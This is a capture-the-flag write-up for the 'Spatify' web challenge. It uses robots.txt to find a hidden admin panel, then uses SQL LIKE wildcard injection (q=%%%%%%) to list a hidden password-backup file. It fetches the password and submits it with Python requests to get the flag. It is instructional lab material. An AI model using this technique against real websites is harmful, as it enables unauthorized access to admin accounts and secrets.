Difficulty
Easy
Points
150
Description
Welcome to spatify, the perfect place to enjoy some royalty-free music with neither ads nor vulnerabilities at all!
Quick Analysis
Spatify robots.txt file discovery
After running the Burpsuite crawler, or any crawler, the crawler discovered a /robots.txt
file.
What is a robots.txt file used for?
The robots.txt
file tells search engine crawlers which URLs the crawler can access on your site.
Content of robots.txt
Copy from requests import get, post
url = 'https://blackhat4-944f71937411184fb04dddb0c9371eb1-0.chals.bh.ctf.sa'
Copy file = '/robots.txt'
response = get(url + file)
print(response.text)
Copy User-agent: *
Disallow: /superhiddenadminpanel/
Spatify's admin panel
The Spatify admin panel /superhiddenadminpanel/
can only be access via a password.
Spatify search engine
The Spatify home page /
search for music based on the music name.
Default listed music
Copy <div class="mb-2"><b>[FEATURED] Goldn - Praz Khanal</b></div>
<div class="player mx-auto w-100 mb-4">
<audio>
<source src="/static/audio/goldn.mp3" type="audio/mpeg">
</audio>
</div>
<div class="mb-2"><b>[FEATURED] Guitar Electro Sport Trailer - Gvidon</b></div>
<div class="player mx-auto w-100 mb-4">
<audio>
<source src="/static/audio/guitar.mp3" type="audio/mpeg">
</audio>
</div>
<div class="mb-2"><b>[FEATURED] Learn SQL in 3 minutes</b></div>
<div class="player mx-auto w-100 mb-4">
<audio>
<source src="/static/audio/learn_sql.mp3" type="audio/mpeg">
</audio>
</div>
Analyze the search SQL Query
The search requires input with at least five characters.
The common word between all three music names is FEATURED
. The result of FEATURED
search is the same as the home page default music.
I assume the SQL Query
querying is based on LIKE
operator.
The LIKE operator is used in a WHERE clause to search for a specified pattern in a column.
There are two wildcards often used in conjunction with the LIKE operator:
The percent sign (%) represents zero, one, or multiple characters
The underscore sign (_) represents one, single character
LIKE syntax
Copy SELECT column1, column2, ...
FROM table_name
WHERE columnN LIKE pattern;
Spotify Search with SQL Wildcards
The result of FEATURE%
search is the same as the home page default music, which means the query is injectable with SQL wildcards
.
Exploitation
SQL wildcard injection
List all music records with wildcards with five percent signs %
. q=%%%%%%
Copy <div class="mb-2"><b>😋 🅟🅐🅢🅢🅦🅞🅡🅓 🅑🅐🅒🅚🅤🅟 😋</b></div>
<div class="player mx-auto w-100 mb-4">
<audio>
<source src="/static/audio/secret_password_backup.txt.bak" type="audio/mpeg">
</audio>
</div>
<div class="mb-2"><b>[FEATURED] Goldn - Praz Khanal</b></div>
<div class="player mx-auto w-100 mb-4">
<audio>
<source src="/static/audio/goldn.mp3" type="audio/mpeg">
</audio>
</div>
<div class="mb-2"><b>[FEATURED] Guitar Electro Sport Trailer - Gvidon</b></div>
<div class="player mx-auto w-100 mb-4">
<audio>
<source src="/static/audio/guitar.mp3" type="audio/mpeg">
</audio>
</div>
<div class="mb-2"><b>[FEATURED] Learn SQL in 3 minutes</b></div>
<div class="player mx-auto w-100 mb-4">
<audio>
<source src="/static/audio/learn_sql.mp3" type="audio/mpeg">
</audio>
</div>
Content of secret_password_backup.txt.bak
Copy file = '/static/audio/secret_password_backup.txt.bak'
response = get(url + file)
print(response.text)
Copy THISISTHEPASSWORDTOTHEADMINPANEL123321123321
The flag
Copy import re
endpoint = '/superhiddenadminpanel/'
data = { 'password': 'THISISTHEPASSWORDTOTHEADMINPANEL123321123321' }
response = post(url + endpoint, data = data)
html = response.text
flag = re.search('BlackHatMEA{(.*)}', html)
print(flag.group(0))
Copy BlackHatMEA{551:14:dc339129777027c07c8c63bd0310f7da6d9074a6}
References
https://developers.google.com/search/docs/crawling-indexing/robots/intro
https://www.w3schools.com/sql/sql_like.asp